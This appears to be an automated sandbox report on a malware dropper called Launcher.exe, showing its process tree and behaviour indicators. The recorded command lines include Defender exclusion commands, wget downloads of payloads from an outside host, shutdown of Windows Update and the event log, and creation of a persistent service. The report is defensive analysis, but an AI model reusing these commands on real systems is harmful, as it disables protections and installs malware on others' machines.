05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f	Launcher.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1248	powershell.exe
1248	powershell.exe
4220	powershell.exe
4220	powershell.exe
3816	msedge.exe
3816	msedge.exe
2564	msedge.exe
2564	msedge.exe
3972	identity_helper.exe
3972	identity_helper.exe
1648	plugin1515
1648	plugin1515
1664	openwith.exe
1664	openwith.exe
1664	openwith.exe
1664	openwith.exe
2236	msedge.exe
2236	msedge.exe
5376	2plugin28438
5376	2plugin28438
5376	2plugin28438
3648	powershell.exe
3648	powershell.exe
3648	powershell.exe
5376	2plugin28438
5376	2plugin28438
5376	2plugin28438
5376	2plugin28438
5376	2plugin28438
5376	2plugin28438
5376	2plugin28438
5376	2plugin28438
5376	2plugin28438
5376	2plugin28438
5376	2plugin28438
5376	2plugin28438
5376	2plugin28438
5376	2plugin28438
672	kuytqawknxye.exe
672	kuytqawknxye.exe
672	kuytqawknxye.exe
3476	powershell.exe
3476	powershell.exe
3476	powershell.exe
672	kuytqawknxye.exe
672	kuytqawknxye.exe
672	kuytqawknxye.exe
672	kuytqawknxye.exe
672	kuytqawknxye.exe
672	kuytqawknxye.exe
672	kuytqawknxye.exe
672	kuytqawknxye.exe
672	kuytqawknxye.exe
672	kuytqawknxye.exe
672	kuytqawknxye.exe
672	kuytqawknxye.exe
5856	dwm.exe
5856	dwm.exe
5856	dwm.exe
5856	dwm.exe
5856	dwm.exe
5856	dwm.exe
3976	msedge.exe
3976	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 25 IoCs

pid	Process
2564	msedge.exe
2564	msedge.exe
2564	msedge.exe
2564	msedge.exe
2564	msedge.exe
2564	msedge.exe
2564	msedge.exe
2564	msedge.exe
2564	msedge.exe
2564	msedge.exe
2564	msedge.exe
2564	msedge.exe
2564	msedge.exe
2564	msedge.exe
2564	msedge.exe
2564	msedge.exe
2564	msedge.exe
2564	msedge.exe
2564	msedge.exe
2564	msedge.exe
2564	msedge.exe
2564	msedge.exe
2564	msedge.exe
2564	msedge.exe
2564	msedge.exe

Suspicious use of AdjustPrivilegeToken 21 IoCs

description	pid	Process
Token: SeDebugPrivilege	1248	powershell.exe
Token: SeDebugPrivilege	4220	powershell.exe
Token: SeDebugPrivilege	3648	powershell.exe
Token: SeShutdownPrivilege	5940	powercfg.exe
Token: SeCreatePagefilePrivilege	5940	powercfg.exe
Token: SeShutdownPrivilege	5920	powercfg.exe
Token: SeCreatePagefilePrivilege	5920	powercfg.exe
Token: SeShutdownPrivilege	5964	powercfg.exe
Token: SeCreatePagefilePrivilege	5964	powercfg.exe
Token: SeShutdownPrivilege	5948	powercfg.exe
Token: SeCreatePagefilePrivilege	5948	powercfg.exe
Token: SeDebugPrivilege	3476	powershell.exe
Token: SeLockMemoryPrivilege	5856	dwm.exe
Token: SeShutdownPrivilege	2528	powercfg.exe
Token: SeCreatePagefilePrivilege	2528	powercfg.exe
Token: SeShutdownPrivilege	1044	powercfg.exe
Token: SeCreatePagefilePrivilege	1044	powercfg.exe
Token: SeShutdownPrivilege	6004	powercfg.exe
Token: SeCreatePagefilePrivilege	6004	powercfg.exe
Token: SeShutdownPrivilege	5404	powercfg.exe
Token: SeCreatePagefilePrivilege	5404	powercfg.exe

Suspicious use of FindShellTrayWindow 36 IoCs

pid	Process
1704	wget.exe
1572	winrar.exe
1572	winrar.exe
2564	msedge.exe
2564	msedge.exe
2564	msedge.exe
2564	msedge.exe
2564	msedge.exe
2564	msedge.exe
2564	msedge.exe
2564	msedge.exe
2564	msedge.exe
2564	msedge.exe
2564	msedge.exe
2564	msedge.exe
2564	msedge.exe
2564	msedge.exe
2564	msedge.exe
2564	msedge.exe
2564	msedge.exe
2564	msedge.exe
2564	msedge.exe
2564	msedge.exe
2564	msedge.exe
2564	msedge.exe
2564	msedge.exe
2564	msedge.exe
2564	msedge.exe
2656	wget.exe
2204	winrar.exe
2204	winrar.exe
2204	winrar.exe
5408	wget.exe
4644	winrar.exe
4644	winrar.exe
2204	3plugin18226

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
2564	msedge.exe
2564	msedge.exe
2564	msedge.exe
2564	msedge.exe
2564	msedge.exe
2564	msedge.exe
2564	msedge.exe
2564	msedge.exe
2564	msedge.exe
2564	msedge.exe
2564	msedge.exe
2564	msedge.exe
2564	msedge.exe
2564	msedge.exe
2564	msedge.exe
2564	msedge.exe
2564	msedge.exe
2564	msedge.exe
2564	msedge.exe
2564	msedge.exe
2564	msedge.exe
2564	msedge.exe
2564	msedge.exe
2564	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4896 wrote to memory of 3028	4896	Launcher.exe	85
PID 4896 wrote to memory of 3028	4896	Launcher.exe	85
PID 4896 wrote to memory of 3028	4896	Launcher.exe	85
PID 4896 wrote to memory of 3028	4896	Launcher.exe	85
PID 4896 wrote to memory of 3028	4896	Launcher.exe	85
PID 3028 wrote to memory of 1248	3028	Launhcer.exe	86
PID 3028 wrote to memory of 1248	3028	Launhcer.exe	86
PID 3028 wrote to memory of 1248	3028	Launhcer.exe	86
PID 1248 wrote to memory of 4916	1248	powershell.exe	88
PID 1248 wrote to memory of 4916	1248	powershell.exe	88
PID 1248 wrote to memory of 4916	1248	powershell.exe	88
PID 1248 wrote to memory of 4916	1248	powershell.exe	88
PID 1248 wrote to memory of 4916	1248	powershell.exe	88
PID 4916 wrote to memory of 4220	4916	Launcher.exe	89
PID 4916 wrote to memory of 4220	4916	Launcher.exe	89
PID 4916 wrote to memory of 4220	4916	Launcher.exe	89
PID 4916 wrote to memory of 1704	4916	Launcher.exe	93
PID 4916 wrote to memory of 1704	4916	Launcher.exe	93
PID 4916 wrote to memory of 1704	4916	Launcher.exe	93
PID 2564 wrote to memory of 3976	2564	msedge.exe	97
PID 2564 wrote to memory of 3976	2564	msedge.exe	97
PID 4916 wrote to memory of 1572	4916	Launcher.exe	98
PID 4916 wrote to memory of 1572	4916	Launcher.exe	98
PID 4916 wrote to memory of 1572	4916	Launcher.exe	98
PID 2564 wrote to memory of 2812	2564	msedge.exe	99
PID 2564 wrote to memory of 2812	2564	msedge.exe	99
PID 2564 wrote to memory of 2812	2564	msedge.exe	99
PID 2564 wrote to memory of 2812	2564	msedge.exe	99
PID 2564 wrote to memory of 2812	2564	msedge.exe	99
PID 2564 wrote to memory of 2812	2564	msedge.exe	99
PID 2564 wrote to memory of 2812	2564	msedge.exe	99
PID 2564 wrote to memory of 2812	2564	msedge.exe	99
PID 2564 wrote to memory of 2812	2564	msedge.exe	99
PID 2564 wrote to memory of 2812	2564	msedge.exe	99
PID 2564 wrote to memory of 2812	2564	msedge.exe	99
PID 2564 wrote to memory of 2812	2564	msedge.exe	99
PID 2564 wrote to memory of 2812	2564	msedge.exe	99
PID 2564 wrote to memory of 2812	2564	msedge.exe	99
PID 2564 wrote to memory of 2812	2564	msedge.exe	99
PID 2564 wrote to memory of 2812	2564	msedge.exe	99
PID 2564 wrote to memory of 2812	2564	msedge.exe	99
PID 2564 wrote to memory of 2812	2564	msedge.exe	99
PID 2564 wrote to memory of 2812	2564	msedge.exe	99
PID 2564 wrote to memory of 2812	2564	msedge.exe	99
PID 2564 wrote to memory of 2812	2564	msedge.exe	99
PID 2564 wrote to memory of 2812	2564	msedge.exe	99
PID 2564 wrote to memory of 2812	2564	msedge.exe	99
PID 2564 wrote to memory of 2812	2564	msedge.exe	99
PID 2564 wrote to memory of 2812	2564	msedge.exe	99
PID 2564 wrote to memory of 2812	2564	msedge.exe	99
PID 2564 wrote to memory of 2812	2564	msedge.exe	99
PID 2564 wrote to memory of 2812	2564	msedge.exe	99
PID 2564 wrote to memory of 2812	2564	msedge.exe	99
PID 2564 wrote to memory of 2812	2564	msedge.exe	99
PID 2564 wrote to memory of 2812	2564	msedge.exe	99
PID 2564 wrote to memory of 2812	2564	msedge.exe	99
PID 2564 wrote to memory of 2812	2564	msedge.exe	99
PID 2564 wrote to memory of 2812	2564	msedge.exe	99
PID 2564 wrote to memory of 2812	2564	msedge.exe	99
PID 2564 wrote to memory of 2812	2564	msedge.exe	99
PID 2564 wrote to memory of 2812	2564	msedge.exe	99
PID 2564 wrote to memory of 2812	2564	msedge.exe	99
PID 2564 wrote to memory of 2812	2564	msedge.exe	99
PID 2564 wrote to memory of 2812	2564	msedge.exe	99

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:2548
- C:\Windows\SysWOW64\openwith.exe
  "C:\Windows\system32\openwith.exe"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1664

C:\Users\Admin\AppData\Local\Temp\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Launcher.exe"
1⤵
- Checks computer location settings
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:4896
- C:\Users\Admin\AppData\Roaming\services\Launhcer.exe
  "C:\Users\Admin\AppData\Roaming\services\Launhcer.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3028
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$AdminRightsRequired = $true function Get-Win { while ($true) { # if ($AdminRightsRequired) { # try { Start-Process -FilePath '.\data\Launcher.exe' -Verb RunAs -Wait # break } catch { Write-Host 'Error 0xc0000906' } } else { # break } } } Get-Win"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1248
  - - C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe
      "C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:4916
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4220
    - - C:\Users\Admin\AppData\Roaming\services\wget.exe
        
        "C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/1/1 -P C:\Users\Admin\AppData\Roaming\services
        5⤵
        Executes dropped EXE
        Suspicious use of FindShellTrayWindow
        
        PID:1704
    - - C:\Users\Admin\AppData\Roaming\services\winrar.exe
        
        "C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\01plugins*.* "plugin*" C:\Users\Admin\AppData\Roaming\services
        5⤵
        Executes dropped EXE
        Suspicious use of FindShellTrayWindow
        
        PID:1572
    - - C:\Users\Admin\AppData\Roaming\services\plugin1515
        
        C:\Users\Admin\AppData\Roaming\services\plugin1515
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:1648
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1648 -s 612
        6⤵
        Program crash
        
        PID:768
    - - C:\Users\Admin\AppData\Roaming\services\wget.exe
        
        "C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/2/1 -P C:\Users\Admin\AppData\Roaming\services
        5⤵
        Executes dropped EXE
        Suspicious use of FindShellTrayWindow
        
        PID:2656
    - - C:\Users\Admin\AppData\Roaming\services\winrar.exe
        
        "C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\02plugins*.* "2plugin*" C:\Users\Admin\AppData\Roaming\services
        5⤵
        Executes dropped EXE
        Suspicious use of FindShellTrayWindow
        
        PID:2204
    - - C:\Users\Admin\AppData\Roaming\services\2plugin28438
        
        C:\Users\Admin\AppData\Roaming\services\2plugin28438
        5⤵
        Drops file in System32 directory
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:5376
      - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3648
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        6⤵
        
        PID:5276
        
        C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        7⤵
        
        PID:5228
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        6⤵
        Launches sc.exe
        
        PID:5652
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        6⤵
        Launches sc.exe
        
        PID:5760
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        6⤵
        Launches sc.exe
        
        PID:1100
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        6⤵
        Launches sc.exe
        
        PID:5780
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        6⤵
        Launches sc.exe
        
        PID:5872
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        6⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:5940
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        6⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:5920
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        6⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:5948
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        6⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:5964
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe delete "OZLCSUZD"
        6⤵
        Launches sc.exe
        
        PID:1812
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe create "OZLCSUZD" binpath= "C:\ProgramData\cwsdjtkixutq\kuytqawknxye.exe" start= "auto"
        6⤵
        Launches sc.exe
        
        PID:5824
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        6⤵
        Launches sc.exe
        
        PID:6060
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "OZLCSUZD"
        6⤵
        Launches sc.exe
        
        PID:6076
    - - C:\Users\Admin\AppData\Roaming\services\wget.exe
        
        "C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/3/1 -P C:\Users\Admin\AppData\Roaming\services
        5⤵
        Executes dropped EXE
        Suspicious use of FindShellTrayWindow
        
        PID:5408
    - - C:\Users\Admin\AppData\Roaming\services\winrar.exe
        
        "C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\03plugins*.* "3plugin*" C:\Users\Admin\AppData\Roaming\services
        5⤵
        Executes dropped EXE
        Suspicious use of FindShellTrayWindow
        
        PID:4644
    - - C:\Users\Admin\AppData\Roaming\services\3plugin18226
        
        C:\Users\Admin\AppData\Roaming\services\3plugin18226
        5⤵
        Checks computer location settings
        Drops file in Windows directory
        Executes dropped EXE
        Suspicious use of FindShellTrayWindow
        
        PID:2204
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2204 -s 864
        6⤵
        Program crash
        
        PID:1648
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2204 -s 912
        6⤵
        Program crash
        
        PID:1664
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2204 -s 972
        6⤵
        Program crash
        
        PID:5616
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2204 -s 1040
        6⤵
        Program crash
        
        PID:5272
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2204 -s 1052
        6⤵
        Program crash
        
        PID:5324
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2204 -s 1072
        6⤵
        Program crash
        
        PID:5700
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2204 -s 1204
        6⤵
        Program crash
        
        PID:5764
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2204 -s 1244
        6⤵
        Program crash
        
        PID:5880
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2204 -s 1292
        6⤵
        Program crash
        
        PID:4948
      - C:\Users\Admin\AppData\Local\Temp\3086a343d2\Hkbsse.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3086a343d2\Hkbsse.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:5968
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5968 -s 700
        7⤵
        Program crash
        
        PID:3452
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5968 -s 740
        7⤵
        Program crash
        
        PID:2040
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5968 -s 764
        7⤵
        Program crash
        
        PID:3388
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5968 -s 708
        7⤵
        Program crash
        
        PID:5640
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5968 -s 904
        7⤵
        Program crash
        
        PID:5304
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5968 -s 988
        7⤵
        Program crash
        
        PID:5284
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5968 -s 988
        7⤵
        Program crash
        
        PID:5740
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5968 -s 1040
        7⤵
        Program crash
        
        PID:5780
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5968 -s 1060
        7⤵
        Program crash
        
        PID:2684
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5968 -s 912
        7⤵
        Program crash
        
        PID:2600
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5968 -s 1136
        7⤵
        Program crash
        
        PID:5952
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5968 -s 1224
        7⤵
        Program crash
        
        PID:6008
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5968 -s 1484
        7⤵
        Program crash
        
        PID:1240
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5968 -s 1692
        7⤵
        Program crash
        
        PID:6072
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\1000005011\1052d4325d.dll, Main
        7⤵
        Loads dropped DLL
        
        PID:6088
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5968 -s 1676
        7⤵
        Program crash
        
        PID:6040
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5968 -s 1248
        7⤵
        Program crash
        
        PID:6000
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5968 -s 1232
        7⤵
        Program crash
        
        PID:3112
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5968 -s 1132
        7⤵
        Program crash
        
        PID:5428
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5968 -s 1232
        7⤵
        Program crash
        
        PID:5716
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5968 -s 1428
        7⤵
        Program crash
        
        PID:5596
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5968 -s 1716
        7⤵
        Program crash
        
        PID:3876
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5968 -s 1464
        7⤵
        Program crash
        
        PID:4448
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5968 -s 1412
        7⤵
        Program crash
        
        PID:6128
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5968 -s 1680
        7⤵
        Program crash
        
        PID:5096
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5968 -s 1432
        7⤵
        Program crash
        
        PID:264
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5968 -s 1672
        7⤵
        Program crash
        
        PID:5232
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5968 -s 1232
        7⤵
        Program crash
        
        PID:1464
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5968 -s 1464
        7⤵
        Program crash
        
        PID:3692
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5968 -s 1132
        7⤵
        Program crash
        
        PID:4568
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5968 -s 1252
        7⤵
        Program crash
        
        PID:5752
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5968 -s 1188
        7⤵
        Program crash
        
        PID:3992
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5968 -s 952
        7⤵
        Program crash
        
        PID:2808
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5968 -s 1432
        7⤵
        Program crash
        
        PID:3252
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5968 -s 1724
        7⤵
        Program crash
        
        PID:4300
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5968 -s 1192
        7⤵
        Program crash
        
        PID:2584
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5968 -s 1580
        7⤵
        Program crash
        
        PID:5596
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5968 -s 1140
        7⤵
        Program crash
        
        PID:3528
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5968 -s 736
        7⤵
        Program crash
        
        PID:1348
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5968 -s 1464
        7⤵
        
        PID:2392
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5968 -s 1680
        7⤵
        
        PID:5620
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5968 -s 1484
        7⤵
        
        PID:2260
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5968 -s 1576
        7⤵
        
        PID:3252
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5968 -s 1820
        7⤵
        
        PID:1424
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2204 -s 876
        6⤵
        Program crash
        
        PID:6096
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /K rd /s /q "C:\Users\Admin\AppData\Roaming\services" & EXIT
        5⤵
        
        PID:6116

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4300

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2564
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffc0de646f8,0x7ffc0de64708,0x7ffc0de64718
  2⤵
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  PID:3976
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2032,3870347070700220903,1746737846073306803,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2044 /prefetch:2
  2⤵
  PID:2812
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2032,3870347070700220903,1746737846073306803,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3816
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2032,3870347070700220903,1746737846073306803,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2736 /prefetch:8
  2⤵
  PID:4280
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,3870347070700220903,1746737846073306803,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1
  2⤵
  PID:4336
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,3870347070700220903,1746737846073306803,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1
  2⤵
  PID:1388
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
